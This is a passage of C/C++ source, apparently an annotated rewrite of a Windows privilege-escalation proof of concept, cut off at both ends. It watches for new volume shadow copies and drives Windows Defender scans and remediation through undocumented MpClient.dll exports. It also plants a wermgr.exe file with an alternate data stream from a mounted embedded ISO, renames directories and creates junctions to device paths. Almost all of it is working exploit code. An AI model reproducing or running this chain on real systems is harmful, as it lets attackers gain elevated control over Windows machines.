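        OBJECT_DIRECTORY_INFORMATION* buf = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
        if (!buf) {
            printf("[!] Failed to allocate required buffer to query object manager directory.\n");
            *err = ERROR_NOT_ENOUGH_MEMORY;
            return NULL;
        }
        ZeroMemory(buf, reqsz);
        // Fresh context + RestartScan on every call: each pass must see the directory from the top.
        ULONG scanctx = 0;
        ULONG retsz = 0;
        const NTSTATUS stat = _NtQueryDirectoryObject(hobjdir, buf, reqsz, FALSE, TRUE, &scanctx, &retsz);
        if (stat == STATUS_SUCCESS) {
            *entries = reqsz / sizeof(OBJECT_DIRECTORY_INFORMATION);
            return buf;
        }
        free(buf);
        if (stat != STATUS_MORE_ENTRIES) {
            printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
            *err = RtlNtStatusToDosError(stat);
            return NULL;
        }
        reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
    }
}

// True when `name` is already in the baseline list captured at thread start.
static bool IsKnownShadowCopy(const LLShadowVolumeNames* known, const wchar_t* name) {
    for (; known; known = known->next)
        if (_wcsicmp(known->name, name) == 0)
            return true;
    return false;
}

// Thread entry: wait for a NEW volume shadow copy device to appear under "\Device" (one that was
// not present when the thread started), confirm "<device>\Windows" can be opened, and copy the
// NT device path (e.g. "\Device\HarddiskVolumeShadowCopy7") into the caller's buffer
// `fullvsspath`, which may be NULL and is assumed to hold MAX_PATH wide characters.
// Returns a Win32 error code (ERROR_SUCCESS on success).
//
// NOTE(review): both waiting loops spin without sleeping, exactly as the original did — the
// thread burns a core until a snapshot shows up, and never times out. The readiness probe opens
// the directory with ShareAccess 0, also as in the original.
// Fixes relative to the original: the directory buffer is freed on every path (it leaked on the
// error exits), the zero terminator is a stack value instead of an unchecked malloc, the record
// walk is bounded by the buffer size, and path concatenation is bounded by MAX_PATH.
DWORD WINAPI ShadowCopyFinderThread(void* fullvsspath) {
    wchar_t devicepath[] = L"\\Device";
    UNICODE_STRING udevpath = { 0 };
    RtlInitUnicodeString(&udevpath, devicepath);
    OBJECT_ATTRIBUTES objattr = { 0 };
    InitializeObjectAttributes(&objattr, &udevpath, OBJ_CASE_INSENSITIVE, NULL, NULL);

    HANDLE hobjdir = NULL;
    NTSTATUS stat = _NtOpenDirectoryObject(&hobjdir, 0x0001 /* DIRECTORY_QUERY */, &objattr);
    if (stat) {
        printf("[!] Failed to open object manager directory, error: 0x%0.8X\n", stat);
        return RtlNtStatusToDosError(stat);
    }

    // Baseline: whatever shadow copies exist right now. Anything not in this list is "new".
    DWORD retval = ERROR_SUCCESS;
    bool criterr = false;
    int vscnum = 0;
    LLShadowVolumeNames* vsinitial = RetrieveCurrentVSSList(hobjdir, &criterr, &vscnum, &retval);
    if (criterr) {
        printf("[!] Unexpected error while listing current volume shadow copy volumes.\n");
        NtClose(hobjdir);
        return retval;
    }
    if (!vsinitial)
        printf("[*] No volume shadow copies were found.\n");
    else
        printf("[*] Found %d volume shadow copies.\n", vscnum);

    // Poll "\Device" until a HarddiskVolumeShadowCopy* Device object not in the baseline appears.
    static const wchar_t prefix[] = L"HarddiskVolumeShadowCopy";
    wchar_t newvsspath[MAX_PATH] = L"\\Device\\";
    bool srchfound = false;
    while (!srchfound) {
        ULONG maxentries = 0;
        OBJECT_DIRECTORY_INFORMATION* objdirinfo = QueryDeviceDirectory(hobjdir, &maxentries, &retval);
        if (!objdirinfo) {
            DestroyVSSNamesList(vsinitial);
            NtClose(hobjdir);
            return retval;
        }
        OBJECT_DIRECTORY_INFORMATION emptyentry;
        ZeroMemory(&emptyentry, sizeof(emptyentry));
        for (ULONG i = 0; i < maxentries; i++) {
            const OBJECT_DIRECTORY_INFORMATION& entry = objdirinfo[i];
            if (memcmp(&entry, &emptyentry, sizeof(emptyentry)) == 0)
                break;   // all-zero record terminates the listing
            if (!entry.TypeName.Buffer || !entry.Name.Buffer)
                continue;
            if (_wcsicmp(L"Device", entry.TypeName.Buffer) != 0)
                continue;
            if (entry.Name.Length < sizeof(prefix) ||
                memcmp(prefix, entry.Name.Buffer, sizeof(prefix) - sizeof(wchar_t)) != 0)
                continue;
            if (IsKnownShadowCopy(vsinitial, entry.Name.Buffer))
                continue;
            wcsncat(newvsspath, entry.Name.Buffer, MAX_PATH - wcslen(newvsspath) - 1);
            srchfound = true;
            break;
        }
        free(objdirinfo);
    }
    NtClose(hobjdir);
    printf("[+] New volume shadow copy detected: %ws\n", newvsspath);

    // Readiness probe: STATUS_NO_SUCH_DEVICE means the object exists but the snapshot volume is
    // not mounted yet, so keep retrying until the open gets a definite answer.
    wchar_t vsswinpath[MAX_PATH] = { 0 };
    wcscpy(vsswinpath, newvsspath);
    wcsncat(vsswinpath, L"\\Windows", MAX_PATH - wcslen(vsswinpath) - 1);
    UNICODE_STRING _vsswinpath = { 0 };
    RtlInitUnicodeString(&_vsswinpath, vsswinpath);
    OBJECT_ATTRIBUTES objattr2 = { 0 };
    InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
    IO_STATUS_BLOCK iostat = { 0 };
    HANDLE hlk = NULL;
    do {
        stat = NtCreateFile(&hlk, FILE_READ_ATTRIBUTES, &objattr2, &iostat, NULL, 0, 0, FILE_OPEN, 0, NULL, 0);
    } while (stat == STATUS_NO_SUCH_DEVICE);
    if (stat) {
        printf("[!] Failed to open volume shadow copy, error: 0x%0.8X\n", stat);
        retval = RtlNtStatusToDosError(stat);
    } else {
        printf("[+] Successfully accessed volume shadow copy.\n");
        CloseHandle(hlk);
        if (fullvsspath)
            wcscpy((wchar_t*)fullvsspath, newvsspath);
    }

    DestroyVSSNamesList(vsinitial);
    return retval;
}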
// Callback registered with MpCleanStart (WDStartScan puts this function in both callback slots).
// It only logs; returning 0 reports success to the caller.
DWORD MpCleanCallbackFunction() {
    static const char* const message = "[*] MpCleanCallbackFunction called.\n";
    fputs(message, stdout);
    return 0;
}
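// Read HKLM\SOFTWARE\Microsoft\Windows Defender\InstallLocation into `dirname`, which must hold
// at least MAX_PATH wide characters. Returns false (after printing why) when the key or value
// cannot be read or the value is not a string.
// Fixes relative to the original: the key handle is closed on every path (it leaked when the
// value query failed), the value type is checked, and the result is always NUL-terminated
// (RegQueryValueEx does not guarantee a terminator for REG_SZ data).
bool GetWDInstallDir(wchar_t* dirname) {
    HKEY hkey = NULL;
    LSTATUS lstat = RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender", 0, KEY_QUERY_VALUE, &hkey);
    if (lstat != ERROR_SUCCESS) {
        printf("[!] Failed to open Windows Defender registry key, error: %d\n", lstat);
        return false;
    }
    DWORD keytype = REG_SZ;
    DWORD datasz = (MAX_PATH - 1) * sizeof(wchar_t);   // keep one slot free for our terminator
    lstat = RegQueryValueExW(hkey, L"InstallLocation", NULL, &keytype, (LPBYTE)dirname, &datasz);
    RegCloseKey(hkey);
    if (lstat != ERROR_SUCCESS) {
        printf("[!] Failed to query Windows Defender install location, error: %d\n", lstat);
        return false;
    }
    if (keytype != REG_SZ && keytype != REG_EXPAND_SZ) {
        printf("[!] Unexpected type for Windows Defender install location: %u\n", keytype);
        return false;
    }
    dirname[datasz / sizeof(wchar_t)] = L'\0';
    return true;
}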
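// Fill `dirname` (MAX_PATH wide characters) with "<Windows directory>\System32". Despite the name
// this is not a WER-specific location; the function is not referenced in the visible listing.
// Returns false, leaving `dirname` untouched, if GetWindowsDirectory fails or the result would
// not fit (the original ignored the API result and would have produced "\System32").
bool GetWERDir(wchar_t* dirname) {
    wchar_t windir[MAX_PATH] = { 0 };
    const UINT len = GetWindowsDirectoryW(windir, MAX_PATH);
    if (len == 0 || len >= MAX_PATH)
        return false;
    static const wchar_t suffix[] = L"\\System32";
    if (len + (sizeof(suffix) / sizeof(suffix[0])) > MAX_PATH)   // suffix size includes the terminator
        return false;
    wcscpy(dirname, windir);
    wcscat(dirname, suffix);
    return true;
}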
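// Resolved MpClient.dll entry points. MpClient is undocumented; the prototypes are the
// reverse-engineered ones carried over from the original listing.
struct MpClientApi {
    HRESULT(WINAPI* ManagerOpen)(DWORD, PMPHANDLE);
    HRESULT(WINAPI* ScanStart)(MPHANDLE, MPSCAN_TYPE, DWORD, PMPSCAN_RESOURCES, PMPCALLBACK_INFO, PMPHANDLE);
    HRESULT(WINAPI* ScanResult)(MPHANDLE, void*);
    HRESULT(WINAPI* ThreatOpen)(MPHANDLE, MPTHREAT_SOURCE, MPTHREAT_TYPE, PMPHANDLE);
    HRESULT(WINAPI* ThreatEnumerate)(MPHANDLE, PMPTHREAT_INFO*);
    HRESULT(WINAPI* CleanOpen)(void*, void*, void***);
    HRESULT(WINAPI* CleanStart)(void*, unsigned int, void*);
    HRESULT(WINAPI* HandleClose)(MPHANDLE);
};

// Store the export `name` of `hm` into *slot; false when the export is missing.
template <typename Fn>
static bool LoadExport(HMODULE hm, const char* name, Fn* slot) {
    *slot = reinterpret_cast<Fn>(GetProcAddress(hm, name));
    return *slot != nullptr;
}

// Resolve every export used below. All lookups are attempted so a missing one is easy to spot
// under a debugger; returns false if any is absent. (The original also looked up MpUpdateStart
// but never used or checked it.)
static bool ResolveMpClientApi(HMODULE hm, MpClientApi* api) {
    bool ok = true;
    ok = LoadExport(hm, "MpManagerOpen", &api->ManagerOpen) && ok;
    ok = LoadExport(hm, "MpScanStart", &api->ScanStart) && ok;
    ok = LoadExport(hm, "MpScanResult", &api->ScanResult) && ok;
    ok = LoadExport(hm, "MpThreatOpen", &api->ThreatOpen) && ok;
    ok = LoadExport(hm, "MpThreatEnumerate", &api->ThreatEnumerate) && ok;
    ok = LoadExport(hm, "MpCleanOpen", &api->CleanOpen) && ok;
    ok = LoadExport(hm, "MpCleanStart", &api->CleanStart) && ok;
    ok = LoadExport(hm, "MpHandleClose", &api->HandleClose) && ok;
    return ok;
}

// Thread entry: run a Windows Defender scan of the file named by the global `zippath` through
// MpClient.dll and, if a known-bad detection comes back, start its remediation. Mirrors the
// original control flow, including ExitProcess on every failure (the process is the PoC; there is
// no caller to report to). On the success path all Mp handles and the result buffer are released.
// Fixes relative to the original: the MpClient path is built with an explicit separator and a
// length check instead of relying on a trailing backslash in the registry value, allocations are
// checked, the threat record is null-checked before use, and scanres is no longer leaked.
DWORD WINAPI WDStartScan(void*) {
    wchar_t installdir[MAX_PATH] = { 0 };
    if (!GetWDInstallDir(installdir))
        ExitProcess(1);
    const size_t dirlen = wcslen(installdir);
    const wchar_t* sep = (dirlen > 0 && installdir[dirlen - 1] == L'\\') ? L"" : L"\\";
    wchar_t dllpath[MAX_PATH] = { 0 };
    if (swprintf(dllpath, MAX_PATH, L"%ls%lsMpClient.dll", installdir, sep) < 0) {
        printf("[!] Windows Defender install path is too long.\n");
        ExitProcess(1);
    }
    // Absolute path from HKLM: no DLL search-order lookup is involved.
    HMODULE hm = LoadLibraryW(dllpath);
    if (!hm) {
        printf("[!] Failed to load MpClient.dll, error: %d\n", GetLastError());
        ExitProcess(1);
    }
    MpClientApi mp = { 0 };
    if (!ResolveMpClientApi(hm, &mp)) {
        printf("[!] Failed to initialize DLL imports.\n");
        ExitProcess(1);
    }

    MPHANDLE hbinding = NULL;
    HRESULT hres = mp.ManagerOpen(0, &hbinding);
    if (hres != S_OK) {
        printf("[!] Failed to open Windows Defender RPC interface, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }

    MPRESOURCE_INFO scaninfo = { 0 };
    scaninfo.Scheme = (wchar_t*)L"file";
    scaninfo.Path = zippath;
    MPSCAN_RESOURCES scanrsrc = { 0 };
    scanrsrc.dwResourceCount = 1;
    scanrsrc.pResourceList = &scaninfo;
    MPHANDLE scanctx = NULL;
    // 0x60004000: undocumented scan flags, carried over unchanged from the original listing.
    hres = mp.ScanStart(hbinding, MPSCAN_TYPE_RESOURCE, 0x60004000, &scanrsrc, NULL, &scanctx);
    if (hres != S_OK) {
        printf("[!] Failed to start Windows Defender scan, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }

    // MpScanResult's output structure is undocumented; 0x90 bytes is the size the original used.
    void* scanres = calloc(1, 0x90);
    if (!scanres) {
        printf("[!] Failed to allocate memory.\n");
        ExitProcess(1);
    }
    hres = mp.ScanResult(scanctx, scanres);
    if (hres != S_OK) {
        printf("[!] Failed to fetch scan results, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }

    MPHANDLE threatctx = NULL;
    hres = mp.ThreatOpen(scanctx, MPTHREAT_SOURCE_SCAN, MPTHREAT_TYPE_KNOWNBAD, &threatctx);
    if (hres != S_OK) {
        printf("[!] Failed to open threats, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    MPTHREAT_INFO* tinfo = NULL;
    hres = mp.ThreatEnumerate(threatctx, &tinfo);
    if (hres == S_FALSE) {   // 0x1: enumeration exhausted, nothing was detected
        printf("[*] No threats found.\n");
        ExitProcess(0);
    }
    if (hres != S_OK) {
        printf("[!] Failed to enumerate threats, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    // The meaning of ThreatStatus == 0x1 is not documented; it is the value the original expected.
    if (!tinfo || tinfo->ThreatStatus != 0x1) {
        printf("[!] Unexpected reply from MpThreatEnumerate.\n");
        ExitProcess(1);
    }

    void** ret = NULL;
    hres = mp.CleanOpen(scanctx, NULL, &ret);
    if (hres != S_OK) {
        printf("[!] MpCleanOpen failed, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }
    void* callbackaddr[2] = { (void*)MpCleanCallbackFunction, (void*)MpCleanCallbackFunction };
    hres = mp.CleanStart(ret, 0, callbackaddr);
    if (hres != S_OK) {
        printf("[!] MpCleanStart failed, error: 0x%0.8X\n", hres);
        ExitProcess(1);
    }

    free(scanres);
    mp.HandleClose(scanctx);
    mp.HandleClose(threatctx);
    mp.HandleClose(hbinding);
    // MpClient.dll is intentionally left loaded, as in the original.
    return ERROR_SUCCESS;
}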
// Cache of the file read from the mounted ISO on the first WriteEicar call; later calls write
// this buffer instead of re-reading the ISO. Set by WriteEicar, never freed.
char* eicar_data = nullptr;
DWORD eicar_sz = 0;

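// Issue one transfer on a handle that was opened WITHOUT a FILE_SYNCHRONOUS_IO_* option (so every
// Read/WriteFile on it is overlapped), wait for it to finish and report the byte count.
// `what` is used in the failure message ("[!] Failed to <what>, error: N"). Returns false on error.
// The original compared the BOOL result of Read/WriteFile with ERROR_IO_PENDING, which is never
// true, so failures went unnoticed and pending transfers were abandoned with their OVERLAPPED
// (and, for the ADS, their data buffer) already gone.
static bool CompleteOverlappedIo(HANDLE h, bool write, void* buf, DWORD len, DWORD* done, const char* what) {
    OVERLAPPED ovp = { 0 };
    ovp.hEvent = CreateEventW(NULL, FALSE, FALSE, NULL);
    if (!ovp.hEvent) {
        printf("[!] Failed to %s, error: %d\n", what, GetLastError());
        return false;
    }
    const BOOL issued = write ? WriteFile(h, buf, len, NULL, &ovp) : ReadFile(h, buf, len, NULL, &ovp);
    if (!issued) {
        const DWORD err = GetLastError();
        if (err != ERROR_IO_PENDING) {
            printf("[!] Failed to %s, error: %d\n", what, err);
            CloseHandle(ovp.hEvent);
            return false;
        }
    }
    *done = 0;
    const BOOL completed = GetOverlappedResult(h, &ovp, done, TRUE);   // blocks until the I/O is done
    if (!completed)
        printf("[!] Failed to %s, error: %d\n", what, GetLastError());
    CloseHandle(ovp.hEvent);
    return completed != FALSE;
}

// Create "<workdir>\wermgr.exe" (NT path; opened read/write/delete, shared for read only, without
// a synchronous-I/O option) and fill it with the bytes of "<isomnt>\wermgr.exe" plus a 0x1000-byte
// alternate data stream ":WDFOO". The ISO file is read only on the first call; its bytes are cached
// in eicar_data/eicar_sz and subsequent calls rewrite just the main stream from that cache (the ADS
// is not recreated on that path, as in the original). Returns the open handle to the new file,
// which the caller owns, or NULL on failure (all other handles are closed on every path).
// Other fixes relative to the original: every transfer is waited for before buffers are freed or
// handles closed, allocations and the source size are checked, the cache is only published after a
// successful read, the ADS is filled with zeros instead of uninitialised heap memory, the open
// failure message names the file that actually failed, and path formatting is bounded.
HANDLE WriteEicar(wchar_t* workdir, wchar_t* isomnt) {
    wchar_t eicarpath[MAX_PATH] = { 0 };
    if (swprintf(eicarpath, MAX_PATH, L"%ls\\wermgr.exe", workdir) < 0) {
        printf("[!] Work directory path is too long.\n");
        return NULL;
    }
    UNICODE_STRING _eicarpath = { 0 };
    RtlInitUnicodeString(&_eicarpath, eicarpath);
    OBJECT_ATTRIBUTES eicarpathobjattr = { 0 };
    InitializeObjectAttributes(&eicarpathobjattr, &_eicarpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
    IO_STATUS_BLOCK iostat = { 0 };

    HANDLE hfile = NULL;
    NTSTATUS stat = NtCreateFile(&hfile, GENERIC_READ | GENERIC_WRITE | DELETE | SYNCHRONIZE,
                                 &eicarpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
                                 FILE_SHARE_READ, FILE_OVERWRITE_IF, 0 /* no sync option: overlapped */, NULL, 0);
    if (stat) {
        printf("[!] Failed to create EICAR test file: %ws, error: 0x%0.8X\n", eicarpath, stat);
        return NULL;
    }

    DWORD done = 0;
    if (eicar_data && eicar_sz) {
        // Fast path: replay the cached ISO contents into the main stream.
        if (!CompleteOverlappedIo(hfile, true, eicar_data, eicar_sz, &done, "write EICAR data")) {
            CloseHandle(hfile);
            return NULL;
        }
        return hfile;
    }

    // First call: read the source file from the mounted ISO.
    wchar_t eicarsrcpath[MAX_PATH] = { 0 };
    if (swprintf(eicarsrcpath, MAX_PATH, L"%ls\\wermgr.exe", isomnt) < 0) {
        printf("[!] ISO mount path is too long.\n");
        CloseHandle(hfile);
        return NULL;
    }
    UNICODE_STRING _eicarsrcpath = { 0 };
    RtlInitUnicodeString(&_eicarsrcpath, eicarsrcpath);
    OBJECT_ATTRIBUTES eicarsrcpathobjattr = { 0 };
    InitializeObjectAttributes(&eicarsrcpathobjattr, &_eicarsrcpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
    HANDLE hsrc = NULL;
    stat = NtCreateFile(&hsrc, GENERIC_READ, &eicarsrcpathobjattr, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
                        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_OPEN, 0, NULL, 0);
    if (stat) {
        printf("[!] Failed to open EICAR test file: %ws, error: 0x%0.8X\n", eicarsrcpath, stat);
        CloseHandle(hfile);
        return NULL;
    }

    LARGE_INTEGER li = { 0 };
    if (!GetFileSizeEx(hsrc, &li) || li.QuadPart <= 0 || li.QuadPart > 0x7FFFFFFF) {
        printf("[!] Unusable EICAR source file size.\n");
        CloseHandle(hsrc);
        CloseHandle(hfile);
        return NULL;
    }
    const DWORD srcsz = (DWORD)li.QuadPart;
    char* data = (char*)malloc(srcsz);
    if (!data) {
        printf("[!] Failed to allocate memory.\n");
        CloseHandle(hsrc);
        CloseHandle(hfile);
        return NULL;
    }
    if (!CompleteOverlappedIo(hsrc, false, data, srcsz, &done, "read EICAR data") || done != srcsz) {
        free(data);
        CloseHandle(hsrc);
        CloseHandle(hfile);
        return NULL;
    }
    CloseHandle(hsrc);
    eicar_data = data;   // publish the cache only once the read is known to be complete
    eicar_sz = srcsz;

    if (!CompleteOverlappedIo(hfile, true, eicar_data, eicar_sz, &done, "write EICAR data")) {
        CloseHandle(hfile);
        return NULL;
    }

    // Alternate data stream ":WDFOO" relative to the new file, 0x1000 zero bytes.
    UNICODE_STRING adsname = { 0 };
    RtlInitUnicodeString(&adsname, L":WDFOO");
    OBJECT_ATTRIBUTES objattr2 = { 0 };
    InitializeObjectAttributes(&objattr2, &adsname, OBJ_CASE_INSENSITIVE, hfile, NULL);
    HANDLE hstream = NULL;
    stat = NtCreateFile(&hstream, GENERIC_WRITE | SYNCHRONIZE, &objattr2, &iostat, NULL, FILE_ATTRIBUTE_NORMAL,
                        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, FILE_CREATE, 0, NULL, 0);
    if (stat) {
        printf("[!] Failed to create EICAR stream file: %ws%ws, error: 0x%0.8X\n", eicarpath, adsname.Buffer, stat);
        CloseHandle(hfile);
        return NULL;
    }
    void* adsdata = calloc(1, 0x1000);
    if (!adsdata) {
        printf("[!] Failed to allocate memory.\n");
        CloseHandle(hstream);
        CloseHandle(hfile);
        return NULL;
    }
    const bool adsok = CompleteOverlappedIo(hstream, true, adsdata, 0x1000, &done, "write ADS data");
    // The helper has waited for completion, so it is now safe to release the buffer and the stream.
    free(adsdata);
    CloseHandle(hstream);
    if (!adsok) {
        CloseHandle(hfile);
        return NULL;
    }
    return hfile;
}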
// Rename the object behind hobj with NtSetInformationFile(FileRenameInformationEx).
// With targetpath == NULL the new name is "\??\%TEMP%\RP_<uuid>" (NT path form);
// otherwise targetpath is used verbatim. RootDirectory in the rename block stays zero,
// so the name is treated as absolute.
// Returns true on STATUS_SUCCESS, false on any other status except STATUS_SHARING_VIOLATION,
// which is retried in a tight loop with no sleep and no iteration cap (the loop can spin forever).
// NOTE(review): `fri` (malloc, never NULL-checked) and `wuid` (RPC string, RpcStringFreeW) are
// never released, and wcscpy/wcscat into `target` are not bounds-checked against MAX_PATH.
bool MoveToTempDir(HANDLE hobj, wchar_t* targetpath = NULL) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;

wchar_t target[MAX_PATH] = { 0 };
if (targetpath) {
wcscpy(target, targetpath);
} else {
// Default destination: a uniquely named entry under %TEMP%, in \??\ (NT) form.
ExpandEnvironmentStrings(L"\\??\\%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);
}

IO_STATUS_BLOCK iostat = { 0 };
// sizeof(target) is MAX_PATH * sizeof(wchar_t) bytes, so FileName always has room for `target`;
// the whole allocation (not just the used length) is passed as the information length below.
PFILE_RENAME_INFORMATION fri = (PFILE_RENAME_INFORMATION)malloc(sizeof(FILE_RENAME_INFORMATION) + sizeof(target));
ZeroMemory(fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target));
memmove(&fri->FileName[0], target, wcslen(target) * sizeof(wchar_t));
fri->FileNameLength = wcslen(target) * sizeof(wchar_t);
// The two flag bits are not named anywhere in this file; in the public FILE_RENAME_* flag set
// 0x1 is REPLACE_IF_EXISTS and 0x40 is IGNORE_READONLY_ATTRIBUTE - confirm against the SDK header in use.
fri->Flags = 0x00000001 | 0x00000040;

do {
// _NtSetInformationFile is resolved from ntdll.dll in main(); FileRenameInformationEx comes
// from the project's custom_defs namespace (declared outside this excerpt).
NTSTATUS stat = _NtSetInformationFile(hobj, &iostat, fri, sizeof(FILE_RENAME_INFORMATION) + sizeof(target),
(FILE_INFORMATION_CLASS)custom_defs::FileRenameInformationEx);
if (stat == STATUS_SUCCESS)
return true;
// Busy retry: another opener currently blocks the rename.
if (stat == STATUS_SHARING_VIOLATION)
continue;
if (stat) {
printf("[!] Failed to move directory, error: 0x%0.8X\n", stat);
return false;
}
} while (1);

return true;
}
// Make the directory behind hdir a mount-point (junction) reparse point whose substitute
// name is `target`, via FSCTL_SET_REPARSE_POINT; the print name is left empty.
// `target` is copied with wcscpy (no bounds check); the callers in main() pass NT-form
// names ("\Device\..." and "\??\...").
// Returns false if the event cannot be created or GetLastError() is not ERROR_SUCCESS
// after the call, true otherwise. The error check is loose: a synchronous success does
// not reset the last-error value, and HeapFree() runs between DeviceIoControl() and the
// first GetLastError() read, so a stale value can be reported either way.
// NOTE(review): ov.hEvent is never closed (one handle leaked per call); HeapFree's flags
// argument is NULL rather than 0.
bool CreateJunction(HANDLE hdir, wchar_t* target) {
wchar_t rptarget[MAX_PATH] = { 0 };
wchar_t printname[1] = { L'\0' };
wcscpy(rptarget, target);
// All sizes below are in bytes (wide chars * 2).
size_t targetsz = wcslen(rptarget) * 2;
size_t printnamesz = 1 * 2;
// +12 = the four USHORT offset/length fields (8) plus two wide NUL terminators (4).
size_t pathbuffersz = targetsz + printnamesz + 12;
size_t totalsz = pathbuffersz + REPARSE_DATA_BUFFER_HEADER_LENGTH;
// HEAP_GENERATE_EXCEPTIONS: an allocation failure raises an SEH exception instead of returning NULL,
// so rdb is not NULL-checked. HEAP_ZERO_MEMORY supplies the terminators that are not copied explicitly.
REPARSE_DATA_BUFFER* rdb = (REPARSE_DATA_BUFFER*)HeapAlloc(GetProcessHeap(), HEAP_GENERATE_EXCEPTIONS | HEAP_ZERO_MEMORY, totalsz);
rdb->ReparseTag = IO_REPARSE_TAG_MOUNT_POINT;
rdb->ReparseDataLength = static_cast<USHORT>(pathbuffersz);
rdb->Reserved = 0;
// PathBuffer layout: substitute name, its NUL, then the one-wchar print name (just L'\0').
rdb->MountPointReparseBuffer.SubstituteNameOffset = 0;
rdb->MountPointReparseBuffer.SubstituteNameLength = static_cast<USHORT>(targetsz);
memcpy(rdb->MountPointReparseBuffer.PathBuffer, rptarget, targetsz + 2);
rdb->MountPointReparseBuffer.PrintNameOffset = static_cast<USHORT>(targetsz + 2);
rdb->MountPointReparseBuffer.PrintNameLength = static_cast<USHORT>(printnamesz);
// targetsz / 2 + 1 = one past the substitute name's NUL, in wide chars.
memcpy(rdb->MountPointReparseBuffer.PathBuffer + targetsz / 2 + 1, printname, printnamesz);

OVERLAPPED ov = { 0 };
ov.hEvent = CreateEvent(NULL, FALSE, FALSE, NULL);
if (!ov.hEvent) {
return false;
}

// Return value ignored; the outcome is judged from GetLastError() below.
DeviceIoControl(hdir, FSCTL_SET_REPARSE_POINT, rdb, totalsz, NULL, 0, NULL, &ov);
HeapFree(GetProcessHeap(), NULL, rdb);
rdb = NULL;

// Overlapped completion: block until the FSCTL finishes so the last-error reflects its result.
if (GetLastError() == ERROR_IO_PENDING) {
DWORD retsz = 0;
GetOverlappedResult(hdir, &ov, &retsz, TRUE);
}

if (GetLastError() != ERROR_SUCCESS) {
printf("[!] Failed to create reparse point, error: %d\n", GetLastError());
return false;
}

return true;
}
// Write the embedded `rawData` blob (a global defined outside this excerpt) to a fresh
// %TEMP%\RP_<uuid> file, open that file as an ISO virtual disk and attach it read-only
// with no drive letter. On success the virtual-disk handle is stored through hiso (if
// non-NULL) and true is returned; the caller later detaches and closes it.
// NOTE(review): `retval` holds the Win32 error code returned by OpenVirtualDisk/
// AttachVirtualDisk, but the messages print GetLastError() instead; on the WriteFile
// failure path hf is left open, on the attach failure path hvirtdisk is left open,
// `wuid` is never freed, and the temporary .iso file is never deleted.
bool MountISO(HANDLE* hiso) {
GUID uid = { 0 };
RPC_WSTR wuid = { 0 };
UuidCreate(&uid);
UuidToStringW(&uid, &wuid);
wchar_t* wuid2 = (wchar_t*)wuid;

// Win32 (not NT) path form here, as required by the virtdisk API calls below.
wchar_t target[MAX_PATH] = { 0 };
ExpandEnvironmentStrings(L"%TEMP%\\RP_", target, MAX_PATH);
wcscat(target, wuid2);

HANDLE hf = CreateFile(target, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
if (!hf || hf == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create ISO file, error: %d\n", GetLastError());
return false;
}

// The whole blob is written in one synchronous call; a short write is not detected (dwbytes unused).
DWORD dwbytes = 0;
if (!WriteFile(hf, rawData, sizeof(rawData), &dwbytes, NULL)) {
printf("[!] Failed to write data to .iso file, error: %d\n", GetLastError());
return false;
}
CloseHandle(hf);

// Microsoft vendor GUID for VIRTUAL_STORAGE_TYPE, defined locally rather than taken from the SDK header.
static const GUID VIRTUAL_STORAGE_TYPE_VENDOR_MS = {
0xEC984AEC, 0xA0F9, 0x47e9, 0x90, 0x1F, 0x71, 0x41, 0x5A, 0x66, 0x34, 0x5B
};

VIRTUAL_STORAGE_TYPE vst = { VIRTUAL_STORAGE_TYPE_DEVICE_ISO, VIRTUAL_STORAGE_TYPE_VENDOR_MS };
HANDLE hvirtdisk = NULL;

DWORD retval = OpenVirtualDisk(&vst, target,
VIRTUAL_DISK_ACCESS_GET_INFO | VIRTUAL_DISK_ACCESS_ATTACH_RO | VIRTUAL_DISK_ACCESS_DETACH,
OPEN_VIRTUAL_DISK_FLAG_NONE, NULL, &hvirtdisk);
if (retval) {
printf("[!] Failed to open virtual disk, error: %d\n", GetLastError());
return false;
}

// Read-only, no drive letter: the image is reachable by its \Device\ name (see main()) but not as a lettered volume.
retval = AttachVirtualDisk(hvirtdisk, NULL,
ATTACH_VIRTUAL_DISK_FLAG_READ_ONLY | ATTACH_VIRTUAL_DISK_FLAG_NO_DRIVE_LETTER,
NULL, NULL, NULL);
if (retval) {
printf("[!] Failed to attach virtual disk, error: %d\n", GetLastError());
return false;
}

if (hiso)
*hiso = hvirtdisk;

return true;
}

// Enable or disable one named privilege on an access token.
// hToken           - the token to adjust.
// lpszPrivilege    - privilege name (for example SE_DEBUG_NAME).
// bEnablePrivilege - TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear the attributes.
// Returns TRUE only when the privilege was actually adjusted; FALSE (with a message on
// stdout) when the name cannot be looked up, the adjustment call fails, or the call
// succeeds but reports ERROR_NOT_ALL_ASSIGNED because the token never held the privilege.
BOOL SetPrivilege(HANDLE hToken, LPCTSTR lpszPrivilege, BOOL bEnablePrivilege) {
LUID privilegeLuid;
if (!LookupPrivilegeValue(NULL, lpszPrivilege, &privilegeLuid)) {
printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
return FALSE;
}

TOKEN_PRIVILEGES adjustment;
adjustment.PrivilegeCount = 1;
adjustment.Privileges[0].Luid = privilegeLuid;
